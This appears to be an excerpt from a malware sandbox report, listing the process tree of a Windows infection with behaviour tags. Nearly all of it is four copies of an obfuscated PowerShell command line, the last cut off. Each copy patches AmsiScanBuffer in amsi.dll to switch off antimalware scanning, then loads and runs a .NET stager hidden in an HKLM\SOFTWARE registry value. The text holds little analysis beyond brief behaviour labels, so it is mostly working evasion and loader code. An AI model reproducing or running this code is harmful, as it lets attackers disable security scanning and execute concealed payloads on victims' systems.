C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:RqCzfdqQFbUg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$eeKXAlDDrxhpmM,[Parameter(Position=1)][Type]$YxTldbFIlC)$DFTtJafOFqN=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('Ref'+[Char](108)+''+[Char](101)+''+[Char](99)+'t'+'e'+''+[Char](100)+''+'D'+''+[Char](101)+'le'+[Char](103)+''+'a'+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+'Me'+[Char](109)+'o'+[Char](114)+''+'y'+''+[Char](77)+''+[Char](111)+'d'+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+'yD'+'e'+'l'+[Char](101)+''+'g'+''+'a'+''+[Char](116)+''+'e'+''+'T'+''+'y'+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+'s'+[Char](115)+''+','+''+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+'i'+'c'+[Char](44)+'S'+[Char](101)+''+[Char](97)+''+[Char](108)+''+'e'+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+'s'+[Char](105)+''+[Char](67)+''+[Char](108)+'a'+'s'+''+[Char](115)+','+[Char](65)+'uto'+[Char](67)+'l'+[Char](97)+'s'+'s'+'',[MulticastDelegate]);$DFTtJafOFqN.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+[Char](112)+'ec'+[Char](105)+''+'a'+''+[Char](108)+'N'+[Char](97)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+'de'+[Char](66)+''+[Char](121)+''+'S'+'ig'+[Char](44)+'P'+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$eeKXAlDDrxhpmM).SetImplementationFlags('Runt'+'i'+'me'+[Char](44)+''+'M'+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+'d');$DFTtJafOFqN.DefineMethod(''+[Char](73)+'n'+'v'+''+[Char](111)+''+[Char](107)+''+'e'+'',''+'P'+''+[Char](117)+'b'+'l'+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+'d'+'e'+[Char](66)+''+[Char](121)+''+'S'+''+[Char](105)+'g,'+'N'+''+[Char](101)+''+[Char](119)+'S'+[Char](108)+'o'+'t'+''+[Char](44)+'V'+[Char](105)+'r'+[Char](116)+''+[Char](117)+''+[Char](97)+'l',$YxTldbFIlC,$eeKXAlDDrxhpmM).SetImplementationFlags(''+'R'+''+'u'+'nt'+'i'+'me'+[Char](44)+''+'M'+'a'+[Char](110)+'a'+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $DFTtJafOFqN.CreateType();}$mlStnFTKeIrda=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('Sy'+'s'+''+[Char](116)+'em'+[Char](46)+''+'d'+''+'l'+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+''+'r'+'o'+'s'+'o'+[Char](102)+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+[Char](51)+''+'2'+''+[Char](46)+''+[Char](85)+''+[Char](110)+''+[Char](115)+''+'a'+''+'f'+''+[Char](101)+'N'+[Char](97)+''+[Char](116)+''+[Char](105)+''+'v'+''+[Char](101)+'M'+'e'+''+'t'+'h'+'o'+''+'d'+''+'s'+'');$nshgMzyODAtENk=$mlStnFTKeIrda.GetMethod('G'+'e'+''+'t'+''+[Char](80)+''+[Char](114)+''+'o'+''+[Char](99)+''+'A'+''+[Char](100)+''+[Char](100)+''+[Char](114)+'e'+'s'+''+[Char](115)+'',[Reflection.BindingFlags](''+'P'+''+[Char](117)+''+[Char](98)+'lic'+[Char](44)+''+'S'+''+'t'+''+[Char](97)+'t'+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$RoaDEMQvZaujaKATZMN=RqCzfdqQFbUg @([String])([IntPtr]);$KgkjTminuPmCSpcGkbrwZo=RqCzfdqQFbUg @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$zXOgykGqTZd=$mlStnFTKeIrda.GetMethod('G'+'e'+''+[Char](116)+''+[Char](77)+''+'o'+'d'+[Char](117)+'l'+[Char](101)+''+[Char](72)+''+'a'+''+[Char](110)+''+'d'+'l'+[Char](101)+'').Invoke($Null,@([Object](''+'k'+''+[Char](101)+''+[Char](114)+'n'+[Char](101)+''+[Char](108)+''+'3'+''+'2'+''+[Char](46)+'d'+'l'+''+'l'+'')));$tsNKnmrqrUpzlL=$nshgMzyODAtENk.Invoke($Null,@([Object]$zXOgykGqTZd,[Object](''+[Char](76)+'o'+[Char](97)+''+[Char](100)+''+[Char](76)+''+'i'+'b'+'r'+''+[Char](97)+''+[Char](114)+''+'y'+''+'A'+'')));$SSHzrNaPacnYayKZQ=$nshgMzyODAtENk.Invoke($Null,@([Object]$zXOgykGqTZd,[Object]('Vi'+[Char](114)+''+'t'+''+[Char](117)+''+[Char](97)+''+[Char](108)+''+[Char](80)+''+[Char](114)+''+[Char](111)+'t'+'e'+''+[Char](99)+'t')));$nVQaWhq=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($tsNKnmrqrUpzlL,$RoaDEMQvZaujaKATZMN).Invoke(''+[Char](97)+''+[Char](109)+''+'s'+'i'+[Char](46)+''+'d'+''+[Char](108)+'l');$tCXnzqYgZmiTreJIE=$nshgMzyODAtENk.Invoke($Null,@([Object]$nVQaWhq,[Object](''+[Char](65)+''+[Char](109)+'s'+'i'+''+[Char](83)+''+[Char](99)+'a'+[Char](110)+''+[Char](66)+''+'u'+''+[Char](102)+'f'+[Char](101)+''+[Char](114)+'')));$JEcqYNvFqD=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SSHzrNaPacnYayKZQ,$KgkjTminuPmCSpcGkbrwZo).Invoke($tCXnzqYgZmiTreJIE,[uint32]8,4,[ref]$JEcqYNvFqD);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$tCXnzqYgZmiTreJIE,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SSHzrNaPacnYayKZQ,$KgkjTminuPmCSpcGkbrwZo).Invoke($tCXnzqYgZmiTreJIE,[uint32]8,0x20,[ref]$JEcqYNvFqD);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+'O'+[Char](70)+''+[Char](84)+''+[Char](87)+''+'A'+''+[Char](82)+''+[Char](69)+'').GetValue('$'+[Char](55)+'7'+[Char](115)+'ta'+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:gDIkIjEHKpmn{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$xkABNKzQLwnrDy,[Parameter(Position=1)][Type]$LRGgvnnBPT)$rlgdiYBHoex=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+'f'+'l'+[Char](101)+''+[Char](99)+'t'+[Char](101)+''+[Char](100)+''+'D'+'el'+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+'M'+[Char](101)+''+[Char](109)+''+[Char](111)+''+[Char](114)+''+[Char](121)+''+[Char](77)+''+[Char](111)+'d'+'u'+''+[Char](108)+'e',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+[Char](101)+''+'l'+''+[Char](101)+'g'+[Char](97)+''+[Char](116)+'e'+'T'+''+'y'+'p'+[Char](101)+'',''+[Char](67)+''+[Char](108)+'as'+[Char](115)+''+[Char](44)+'P'+[Char](117)+'b'+[Char](108)+'i'+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](101)+''+[Char](97)+'le'+'d'+''+[Char](44)+''+[Char](65)+'n'+'s'+''+[Char](105)+'C'+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+'A'+''+[Char](117)+''+[Char](116)+''+[Char](111)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$rlgdiYBHoex.DefineConstructor(''+[Char](82)+''+'T'+''+[Char](83)+''+[Char](112)+'e'+[Char](99)+''+[Char](105)+'al'+[Char](78)+''+[Char](97)+''+[Char](109)+''+[Char](101)+','+[Char](72)+'i'+[Char](100)+''+'e'+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+','+[Char](80)+''+[Char](117)+''+[Char](98)+'li'+'c'+'',[Reflection.CallingConventions]::Standard,$xkABNKzQLwnrDy).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+'e'+''+[Char](44)+'M'+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+'e'+''+[Char](100)+'');$rlgdiYBHoex.DefineMethod(''+[Char](73)+'nv'+[Char](111)+''+'k'+''+[Char](101)+'',''+[Char](80)+''+'u'+'b'+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+'B'+[Char](121)+''+[Char](83)+''+'i'+''+[Char](103)+''+[Char](44)+''+'N'+''+'e'+'wS'+'l'+''+'o'+'t,'+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+'a'+[Char](108)+'',$LRGgvnnBPT,$xkABNKzQLwnrDy).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+''+'i'+'m'+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+'g'+[Char](101)+''+[Char](100)+'');Write-Output $rlgdiYBHoex.CreateType();}$IebYRibjqwPBc=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+'s'+'t'+''+[Char](101)+''+[Char](109)+'.'+[Char](100)+''+[Char](108)+'l')}).GetType(''+[Char](77)+''+'i'+''+[Char](99)+''+[Char](114)+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+''+'t'+''+[Char](46)+''+[Char](87)+''+[Char](105)+'n'+[Char](51)+''+'2'+''+[Char](46)+''+[Char](85)+''+[Char](110)+''+'s'+'a'+'f'+''+[Char](101)+''+[Char](78)+''+'a'+''+[Char](116)+'i'+'v'+''+[Char](101)+''+[Char](77)+'eth'+[Char](111)+''+'d'+''+'s'+'');$HhwSzKBzaAcoxq=$IebYRibjqwPBc.GetMethod(''+'G'+''+'e'+''+[Char](116)+''+[Char](80)+'r'+[Char](111)+''+'c'+''+[Char](65)+''+[Char](100)+''+[Char](100)+''+[Char](114)+'e'+[Char](115)+''+'s'+'',[Reflection.BindingFlags](''+[Char](80)+''+'u'+''+'b'+''+'l'+''+'i'+'c'+','+''+[Char](83)+'ta'+[Char](116)+''+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$oFXvCTGpTAtcBgHyEpr=gDIkIjEHKpmn @([String])([IntPtr]);$bnlgxnioUDmvwEwXwgOmoh=gDIkIjEHKpmn @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$FUkGYelKRdt=$IebYRibjqwPBc.GetMethod(''+[Char](71)+'e'+[Char](116)+'Mo'+[Char](100)+''+'u'+''+[Char](108)+''+[Char](101)+''+[Char](72)+'a'+'n'+''+'d'+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+'r'+'n'+[Char](101)+''+[Char](108)+''+[Char](51)+'2'+[Char](46)+''+[Char](100)+''+[Char](108)+''+'l'+'')));$xNeWNxgeMlVVap=$HhwSzKBzaAcoxq.Invoke($Null,@([Object]$FUkGYelKRdt,[Object](''+[Char](76)+''+'o'+''+[Char](97)+''+[Char](100)+''+[Char](76)+''+[Char](105)+''+[Char](98)+''+[Char](114)+''+[Char](97)+''+[Char](114)+''+'y'+'A')));$mopELYsNiQGHvMJnz=$HhwSzKBzaAcoxq.Invoke($Null,@([Object]$FUkGYelKRdt,[Object](''+'V'+'i'+'r'+'t'+'u'+''+'a'+''+[Char](108)+''+'P'+''+[Char](114)+''+'o'+''+'t'+''+[Char](101)+''+'c'+''+[Char](116)+'')));$EumloTV=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($xNeWNxgeMlVVap,$oFXvCTGpTAtcBgHyEpr).Invoke('amsi'+'.'+''+[Char](100)+'ll');$sginWuSYIZmpXbuuE=$HhwSzKBzaAcoxq.Invoke($Null,@([Object]$EumloTV,[Object]('A'+[Char](109)+''+[Char](115)+''+[Char](105)+'Sc'+[Char](97)+''+[Char](110)+'B'+[Char](117)+''+[Char](102)+'f'+[Char](101)+''+[Char](114)+'')));$zbCQOKWelJ=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($mopELYsNiQGHvMJnz,$bnlgxnioUDmvwEwXwgOmoh).Invoke($sginWuSYIZmpXbuuE,[uint32]8,4,[ref]$zbCQOKWelJ);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$sginWuSYIZmpXbuuE,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($mopELYsNiQGHvMJnz,$bnlgxnioUDmvwEwXwgOmoh).Invoke($sginWuSYIZmpXbuuE,[uint32]8,0x20,[ref]$zbCQOKWelJ);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+'T'+[Char](87)+''+'A'+''+[Char](82)+''+'E'+'').GetValue(''+'$'+''+[Char](55)+'7s'+[Char](116)+''+[Char](97)+''+'g'+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:yLvNxyCgHSNB{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$wYqmRsOjzQXVTb,[Parameter(Position=1)][Type]$wlFOXKSmJw)$sQEGakyyjZz=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+[Char](102)+''+'l'+''+[Char](101)+''+'c'+''+[Char](116)+''+[Char](101)+'d'+[Char](68)+''+'e'+''+[Char](108)+''+[Char](101)+''+'g'+'ate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+'e'+'m'+[Char](111)+''+'r'+'y'+[Char](77)+''+'o'+'d'+'u'+'l'+'e'+'',$False).DefineType('M'+'y'+''+[Char](68)+''+[Char](101)+''+'l'+''+'e'+'g'+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+''+[Char](121)+''+[Char](112)+'e','C'+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+''+[Char](117)+'b'+[Char](108)+'ic'+','+''+[Char](83)+''+[Char](101)+''+'a'+''+[Char](108)+''+[Char](101)+'d'+','+''+[Char](65)+''+'n'+''+[Char](115)+''+[Char](105)+''+'C'+''+[Char](108)+'a'+'s'+''+'s'+',A'+'u'+''+[Char](116)+'o'+[Char](67)+'l'+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$sQEGakyyjZz.DefineConstructor(''+'R'+'T'+[Char](83)+'p'+[Char](101)+''+[Char](99)+''+[Char](105)+''+[Char](97)+'l'+[Char](78)+'am'+'e'+''+[Char](44)+''+'H'+''+[Char](105)+''+'d'+''+'e'+'B'+[Char](121)+'S'+'i'+'g'+','+''+[Char](80)+''+[Char](117)+'b'+'l'+'ic',[Reflection.CallingConventions]::Standard,$wYqmRsOjzQXVTb).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+'t'+'i'+''+[Char](109)+''+'e'+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+'ge'+'d'+'');$sQEGakyyjZz.DefineMethod(''+[Char](73)+''+'n'+''+'v'+''+'o'+''+'k'+''+'e'+'',''+'P'+''+[Char](117)+''+'b'+'l'+[Char](105)+''+[Char](99)+','+'H'+''+[Char](105)+'d'+'e'+'B'+'y'+'S'+'i'+''+[Char](103)+','+[Char](78)+'e'+[Char](119)+''+[Char](83)+''+'l'+'o'+[Char](116)+','+[Char](86)+''+[Char](105)+'r'+'t'+''+[Char](117)+''+'a'+'l',$wlFOXKSmJw,$wYqmRsOjzQXVTb).SetImplementationFlags(''+[Char](82)+''+'u'+''+'n'+''+[Char](116)+'ime'+','+''+[Char](77)+'a'+[Char](110)+''+'a'+'g'+[Char](101)+''+[Char](100)+'');Write-Output $sQEGakyyjZz.CreateType();}$lKEGGapqIYLgi=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+[Char](115)+''+'t'+''+[Char](101)+'m'+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+''+'r'+'o'+[Char](115)+''+'o'+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+'3'+'2'+'.U'+[Char](110)+''+[Char](115)+''+[Char](97)+'fe'+[Char](78)+''+'a'+''+'t'+''+'i'+''+[Char](118)+'eM'+[Char](101)+''+'t'+''+'h'+''+[Char](111)+''+'d'+''+[Char](115)+'');$aGvKuKgoPsQhRJ=$lKEGGapqIYLgi.GetMethod(''+'G'+''+[Char](101)+''+'t'+''+'P'+''+'r'+''+[Char](111)+''+'c'+''+'A'+''+[Char](100)+''+'d'+''+[Char](114)+'e'+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags]('P'+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+'S'+'t'+'a'+''+[Char](116)+''+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$qwNYerYaavrsFvfAouh=yLvNxyCgHSNB @([String])([IntPtr]);$RalRVqdmXSQiBRnrDJcxiX=yLvNxyCgHSNB @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$NGyYcJByZDW=$lKEGGapqIYLgi.GetMethod(''+'G'+''+[Char](101)+''+'t'+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+''+[Char](72)+''+[Char](97)+''+[Char](110)+''+[Char](100)+'l'+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+''+[Char](110)+''+[Char](101)+''+'l'+'3'+[Char](50)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$JqQjQCMabhdbDC=$aGvKuKgoPsQhRJ.Invoke($Null,@([Object]$NGyYcJByZDW,[Object](''+[Char](76)+''+'o'+''+[Char](97)+''+'d'+'L'+'i'+''+[Char](98)+''+'r'+''+[Char](97)+'r'+[Char](121)+''+[Char](65)+'')));$GAvGAuMTjXwWRYzCS=$aGvKuKgoPsQhRJ.Invoke($Null,@([Object]$NGyYcJByZDW,[Object](''+'V'+''+[Char](105)+'r'+[Char](116)+'u'+[Char](97)+''+[Char](108)+'Pr'+[Char](111)+''+'t'+''+'e'+''+'c'+''+[Char](116)+'')));$AcnlBgA=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($JqQjQCMabhdbDC,$qwNYerYaavrsFvfAouh).Invoke(''+[Char](97)+'m'+[Char](115)+''+[Char](105)+'.'+'d'+''+'l'+''+'l'+'');$rjVbczLUJsvkZMCUh=$aGvKuKgoPsQhRJ.Invoke($Null,@([Object]$AcnlBgA,[Object](''+'A'+'m'+'s'+'i'+[Char](83)+''+'c'+''+[Char](97)+''+'n'+''+[Char](66)+''+'u'+''+[Char](102)+'f'+[Char](101)+''+'r'+'')));$ddBIARAphv=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GAvGAuMTjXwWRYzCS,$RalRVqdmXSQiBRnrDJcxiX).Invoke($rjVbczLUJsvkZMCUh,[uint32]8,4,[ref]$ddBIARAphv);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$rjVbczLUJsvkZMCUh,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GAvGAuMTjXwWRYzCS,$RalRVqdmXSQiBRnrDJcxiX).Invoke($rjVbczLUJsvkZMCUh,[uint32]8,0x20,[ref]$ddBIARAphv);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+'F'+[Char](84)+''+'W'+''+[Char](65)+''+'R'+''+'E'+'').GetValue(''+[Char](36)+'7'+[Char](55)+'s'+[Char](116)+'a'+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:ZPNkURkimYtk{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$fgOsptVruwAWOD,[Parameter(Position=1)][Type]$ITDxgAhzST)$OauimVoAgGK=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+[Char](102)+'l'+[Char](101)+'ct'+'e'+''+[Char](100)+''+[Char](68)+'e'+[Char](108)+''+[Char](101)+'g'+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+'M'+''+[Char](101)+''+[Char](109)+'o'+'r'+''+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+'l'+''+'e'+'',$False).DefineType(''+'M'+''+'y'+''+[Char](68)+''+[Char](101)+''+'l'+''+'e'+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+'e'+''+[Char](84)+''+'y'+''+[Char](112)+''+'e'+'',''+'C'+''+[Char](108)+''+[Char](97)+'s'+[Char](115)+''+[Char](44)+'P'+[Char](117)+'b'+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+[Char](83)+''+[Char](101)+''+[Char](97)+'le'+[Char](100)+''+','+''+[Char](65)+''+[Char](110)+''+'s'+''+[Char](105)+''+'C'+'l'+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+'A'+'u'+'t'+[Char](111)+'C'+'l'+'ass',[MulticastDelegate]);$OauimVoAgGK.DefineConstructor(''+'R'+''+[Char](84)+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+'c'+''+[Char](105)+''+'a'+''+'l'+''+[Char](78)+''+'a'+''+[Char](109)+'e,H'+'i'+''+[Char](100)+''+'e'+''+[Char](66)+''+'y'+'S'+[Char](105)+''+'g'+''+','+'P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$fgOsptVruwAWOD).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+'t'+''+[Char](105)+''+'m'+''+'e'+''+','+'M'+[Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+''+'e'+''+[Char](100)+'');$OauimVoAgGK.DefineMethod(''+'I'+'n'+[Char](118)+'ok'+[Char](101)+'',''+'P'+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+''+','+'Hi'+[Char](100)+'eB'+[Char](121)+''+[Char](83)+''+'i'+''+[Char](103)+','+'N'+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+[Char](108)+''+[Char](111)+''+[Char](116)+',Vi'+[Char](114)+'t'+'u'+'al',$ITDxgAhzST,$fgOsptVruwAWOD).SetImplementationFlags('R'+[Char](117)+'nti'+[Char](109)+'e'+[Char](44)+'M'+[Char](97)+''+'n'+''+'a'+'g'+'e'+''+[Char](100)+'');Write-Output $OauimVoAgGK.CreateType();}$UmLDnTpweeIbI=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+'y'+''+'s'+''+[Char](116)+'e'+'m'+''+[Char](46)+''+'d'+''+'l'+''+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+''+'r'+''+[Char](111)+'s'+'o'+''+[Char](102)+'t'+[Char](46)+'W'+[Char](105)+''+[Char](110)+''+'3'+'2'+[Char](46)+''+[Char](85)+''+[Char](110)+''+[Char](115)+''+'a'+''+[Char](102)+''+[Char](101)+'N'+'a'+''+'t'+''+'i'+''+[Char](118)+'e'+'M'+''+[Char](101)+''+[Char](116)+''+[Char](104)+''+'o'+''+[Char](100)+''+[Char](115)+'');$XSTyVCaAnoTCFd=$UmLDnTpweeIbI.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+'c'+''+[Char](65)+''+[Char](100)+''+[Char](100)+''+[Char](114)+''+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags]('P'+'u'+''+'b'+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+'S'+'t'+''+[Char](97)+''+'t'+''+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$gUtZxdslJyTBssODtFX=ZPNkURkimYtk @([String])([IntPtr]);$RgUxfclrpUItMEZhbaPhSQ=ZPNkURkimYtk @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$zelDmDEHJBJ=$UmLDnTpweeIbI.GetMethod(''+'G'+'e'+'t'+''+'M'+''+[Char](111)+''+[Char](100)+'u'+'l'+''+'e'+'H'+[Char](97)+''+'n'+''+'d'+''+'l'+'e').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+''+[Char](110)+''+[Char](101)+'l'+'3'+''+'2'+'.'+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$fcudVlXuBvHSAE=$XSTyVCaAnoTCFd.Invoke($Null,@([Object]$zelDmDEHJBJ,[Object](''+[Char](76)+'o'+'a'+''+[Char](100)+''+[Char](76)+''+[Char](105)+''+'b'+''+'r'+'a'+'r'+''+[Char](121)+''+[Char](65)+'')));$INhWIgxiqzUNlipaq=$XSTyVCaAnoTCFd.Invoke($Null,@([Object]$zelDmDEHJBJ,[Object]('V'+[Char](105)+'rt'+[Char](117)+''+[Char](97)+'l'+'P'+'ro'+[Char](116)+''+[Char](101)+''+[Char](99)+''+'t'+'')));$ddbiWad=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($fcudVlXuBvHSAE,$gUtZxdslJyTBssODtFX).Invoke(''+'a'+'m'+[Char](115)+''+[Char](105)+''+[Char](46)+''+'d'+'l'+'l'+'');$zdAzOrxrnbEkAHdUU=$XSTyVCaAnoTCFd.Invoke($Null,@([Object]$ddbiWad,[Object]('A'+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](83)+'c'+[Char](97)+''+'n'+''+[Char](66)+''+'u'+''+'f'+''+[Char](102)+''+'e'+''+[Char](114)+'')));$LYhCbXGNFj=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($INhWIgxiqzUNlipaq,$RgUxfclrpUItMEZhbaPhSQ).Invoke($zdAzOrxrnbEkAHdUU,[uint32]8,4,[ref]$LYhCbXGNFj);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$zdAzOrxrnbEkAHdUU,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($INhWIgxiqzUNlipaq,$RgUxfclrpUItMEZhbaPhSQ).Invoke($zdAzOrxrnbEkAHdUU,[uint32]8,0x20,[ref]$LYhCbXGNFj);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+'